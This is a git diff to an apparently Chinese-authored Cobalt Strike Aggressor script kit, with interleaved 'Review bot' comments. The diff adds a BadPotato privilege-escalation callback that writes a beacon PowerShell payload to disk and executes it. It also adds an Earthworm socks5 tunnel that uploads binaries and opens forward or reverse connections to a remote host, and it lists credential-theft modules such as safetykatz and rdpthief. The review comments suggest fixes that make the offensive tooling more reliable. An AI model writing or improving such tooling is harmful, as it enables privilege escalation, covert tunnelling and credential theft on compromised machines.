diff --git a/Main.cna b/Main.cna
index 4783cdd..4b17816 100644
--- a/Main.cna
+++ b/Main.cna
@@ -2,7 +2,7 @@ action("\cB Loading initial scripts.....");
 include(script_resource("Common.sl"));
 include(script_resource("modules/commands.cna"));
-action("\c9 Loaded commands: safetykatz,seatbelt,hivejack,logonscreen");
+action("\c9 Loaded commands: safetykatz,seatbelt,hivejack,logonscreen,badcmd");
 include(script_resource("modules/auxiliary.cna"));
 include(script_resource("third/rdpthief/RdpThief.cna"));
 action("\c9 Loaded command: rdpthief");
diff --git a/README.md b/README.md
index 06b4a01..7c7da37 100644
--- a/README.md
+++ b/README.md
@@ -4,6 +4,14 @@
 **由于异步处理问题,某些功能可能会存在BUG**
 **暂时未找到解决方法,如果大佬们有解决方案,欢迎联系我~**
+
+## 更新日志 2020-10-19(V1.3.5)
+- 添加badcmd命令(基于badpotato)
+- potatos提权添加badpotato
+- post模块添加socks功能(基于ew)
+ >详见post---->Socks tunnel
+ ![输入图片描述](README_md_files/20201019154454.png?v=1&type=image)
+- **删除信息收集模块审计功能**
 ## 更新日志 2020-07-31(V1.3.4)
 - 添加fakelogonscreen命令
 - 添加SpaceRunner
diff --git a/README_md_files/20201019154454.png b/README_md_files/20201019154454.png
new file mode 100644
index 0000000..c2dfe7d
Binary files /dev/null and b/README_md_files/20201019154454.png differ
diff --git a/README_md_files/image.png b/README_md_files/image.png
index 0fc0bc6..ea86bba 100644
Binary files a/README_md_files/image.png and b/README_md_files/image.png differ
diff --git a/modules/lpe.cna b/modules/lpe.cna
index 6284658..7c23df4 100644
--- a/modules/lpe.cna
+++ b/modules/lpe.cna
@@ -3,17 +3,11 @@ sub RunJuicyPotato{
 btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via JuicyPotato");
- local('$payload $handle $call $port $id $fname $total');
- @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6");
- $total = 8;
+ local('$payload $handle $call $port $id $fname');
 $call = $3['Call'];
 $port = $3['Port'];
 $id = $3['CLSID'];
- while($total >= 0){
- $fname = $fname.rand(@array);
- $total = $total - 1;
- }
- $fname = $fname.".cmd";
+ $fname = Getname().".cmd";
 if ($call eq "CreateProcessWithTokenW"){
 $call = "t";
 }
@@ -41,6 +35,18 @@ sub RunJuicyPotato{
 exec("cmd.exe /C del /F ".$fname);
 }
+sub BadPotato{
+ btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via BadPotato");
+ local('$payload $handle $fname');
+ $fname = Getname().".cmd";
+ $payload = powershell($3['listener'], false);
+ $handle = openf("> $+ $fname");
+ writeb($handle, $payload);
+ closef($handle);
+ bupload!($bid, $fname);
+ bexecute_assembly($bid, script_resource("post/BadPotato.exe"), $fname);
+}
+
 sub CVE_2018_8120{
 btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via CVE-2018-8120");
 local('$Rch $payload');
@@ -178,6 +184,14 @@ sub cve_2019_0803{
 dbutton_action($Dialog, "Exploit");
 dialog_show($Dialog);
 }
+ item "Bad-Potato"{
+ $bid = $1['@'];
+ $Dialog = dialog("Bad Potato",%(bid => $bid),&BadPotato);
+ dialog_description($Dialog, "The vulnerability could allow elevation of privilege.");
+ drow_listener($Dialog, "listener", "Listener: ");
+ dbutton_action($Dialog, "Exploit");
+ dialog_show($Dialog);
+ }
 }
diff --git a/modules/post.cna b/modules/post.cna
index 19b5f69..2643abe 100644
--- a/modules/post.cna
+++ b/modules/post.cna
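Review bot: BadPotato writes the generated `$fname` .cmd file with `openf` but never removes it, while the context line closing RunJuicyPotato shows the existing cleanup `exec("cmd.exe /C del /F ".$fname);`; the new sub should end the same way after the `bexecute_assembly` call so the two potato callbacks behave alike. The callback also tasks the script-global `$bid` that the menu item assigns (without `local`) instead of the id the dialog was created with, so with two dialogs open for different beacons the task goes to whichever beacon was clicked last; reading `local('$bid'); $bid = $3['bid'];` before the `btask` call fixes that, and the same pattern appears in the `Socks` callback added to modules/post.cna. `Getname()` is not defined in this file and is presumably provided by Common.sl included from Main.cna; a one-line comment on the first `Getname()` call saying where it comes from would help the next reader. The `openf` handle is not checked before `writeb`, so an unwritable working directory silently uploads an empty file.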
@@ -85,6 +85,26 @@ sub Migrate{
 bshell!($bid,$cmd);
 btask($bid, "migrating process location to ".$dir.$process.", please wait new session !", "");
 }
+sub Socks{
+ local('$type $lport $refhost $refport $rch');
+ $type = $3['type'];
+ $lport = $3['listenport'];
+ $refhost = $3['refhost'];
+ $refport = $3['refport'];
+ $rch = "x86";
+ if (beacon_info($bid,"is64") == 1){
+ $rch = "x64";
+ }
+ bupload!($bid, script_resource("post/ew/ $+ $rch $+ .exe"));
+ if($type eq "Forward"){
+ bshell!($bid, $rch.".exe -s ssocksd -l ".$lport);
+ btask($bid, "Started socks5 server at: ".beacon_info($bid, "external").":".$lport);
+ }
+ else{
+ bshell!($bid, $rch.".exe -s rssocks -d ".$refhost." -e ".$refport);
+ btask($bid, "Started socks5 server at: ".$refhost.":".$refport);
+ }
+}
 #append menus
@@ -160,4 +180,16 @@ sub Migrate{
 dbutton_action($dialog, "Exec");
 dialog_show($dialog);
 }
+
+ item "Socks tunnel"{
+ $bid = $1['@'];
+ $dialog = dialog("Create socks server",%(bid => $bid, listenport => "1080", refhost => "1.1.1.1", refport => "8888"), &Socks);
+ dialog_description($dialog,"Create a forward or reverse socks5 server use Earthworm.");
+ drow_combobox($dialog, "type", "Type: ", @("Forward", "Reverse"));
+ drow_text($dialog, "listenport", "Listen port(-l): ", "");
+ drow_text($dialog, "refhost", "Reflection host address(-d): ", "");
+ drow_text($dialog, "refport", "Reflection port(-e): ", "");
+ dbutton_action($dialog, "Exec");
+ dialog_show($dialog);
+ }
 }
diff --git a/post/ew/x32.exe b/post/ew/x32.exe
new file mode 100644
index 0000000..35003c8
Binary files /dev/null and b/post/ew/x32.exe differ
diff --git a/post/ew/x64.exe b/post/ew/x64.exe
new file mode 100644
index 0000000..35003c8
Binary files /dev/null and b/post/ew/x64.exe differ
diff --git a/setting.txt b/setting.txt
index 9e5f78f..d8a98c8 100644
--- a/setting.txt
+++ b/setting.txt
@@ -1,2 +1,2 @@
-ver = 1.3.4
+ver = 1.3.5
 dir = C:\Services\
\ No newline at end of file
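Review bot: The 32-bit branch of Socks resolves `$rch = "x86"` to the path `post/ew/x86.exe`, but the files this commit adds are `post/ew/x32.exe` and `post/ew/x64.exe`, so `bupload!` has nothing to upload on a 32-bit beacon and the following `bshell!` invokes an `x86.exe` that never arrived; either rename the binary or change the default to `$rch = "x32";`. The `index` lines of both new binaries show the same blob id `35003c8`, which suggests x32.exe and x64.exe are byte-identical — worth confirming that the x64 file really is the 64-bit build before relying on the `is64` switch. The sub reads the script-global `$bid` rather than the `bid` value the dialog was created with (`$3['bid']`), the same issue as BadPotato in modules/lpe.cna, and `beacon_info($bid,"is64") == 1` appears to compare a string return value numerically — fine in Sleep as far as I can tell, but a comment stating the expected values would help.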
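Review bot: The dialog seeds `refhost` with `1.1.1.1`, a routable public address rather than a placeholder, so an operator who leaves the default and presses Exec sends the reverse connection to an unrelated third party; prefer a documentation address such as `refhost => "192.0.2.1"` or an empty string so the field must be filled in deliberately. `$bid` and `$dialog` are assigned without `local`, making them script-wide globals shared with the other menu items in this file (consistent with the existing items above), which is why the `Socks` callback should read `$3['bid']` instead of `$bid`. The description string would read more naturally as `"Create a forward or reverse socks5 server using Earthworm."`.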